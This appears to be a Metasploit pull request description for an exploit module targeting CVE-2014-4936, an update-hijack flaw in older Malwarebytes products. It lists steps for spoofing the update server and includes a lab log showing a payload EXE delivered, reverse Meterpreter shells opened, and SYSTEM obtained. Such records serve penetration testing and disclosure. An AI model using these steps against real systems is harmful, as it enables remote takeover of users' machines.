rapid7/metasploit-framework
# Add module for Malwarebytes Anti-Malware and Anti-Exploit (CVE-2014-4936)

This module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220.
# Verification Steps
- [x] Spoof data-cdn.mbamupdates.com update server
- [x] Start malicious update server
- [x] Start application and/or manually trigger update

Note that in case of MBAE it takes approximetely 2 minutes for the client to request the update package.

Tested with MBAM 2.0.2.1012 and MBAE 1.03.1.1220, test run results below:

```
msf exploit(mbam_update_exec) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.186.129:4444 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.186.129:80/
[*] Server started.
msf exploit(mbam_update_exec) > [*] 192.168.186.130  mbam_update_exec - MBAM connected
[*] 192.168.186.130  mbam_update_exec - Enforcing update to version 9.99.9.9999
[*] 192.168.186.130  mbam_update_exec - Sending payload EXE...
[*] Sending stage (770048 bytes) to 192.168.186.130
[*] Meterpreter session 1 opened (192.168.186.129:4444 -> 192.168.186.130:1281) at 2015-01-18 16:54:07 +0100
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.186.130 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(mbam_update_exec) > 
[*] 192.168.186.130  mbam_update_exec - MBAE connected
[*] 192.168.186.130  mbam_update_exec - Client may not be vulnerable
[*] 192.168.186.130  mbam_update_exec - Enforcing update to version 9.99.9.9999
[*] 192.168.186.130  mbam_update_exec - Sending payload EXE...
[*] Sending stage (770048 bytes) to 192.168.186.130
[*] Meterpreter session 2 opened (192.168.186.129:4444 -> 192.168.186.130:1286) at 2015-01-18 16:57:21 +0100
sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.186.130 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(mbam_update_exec) >
```
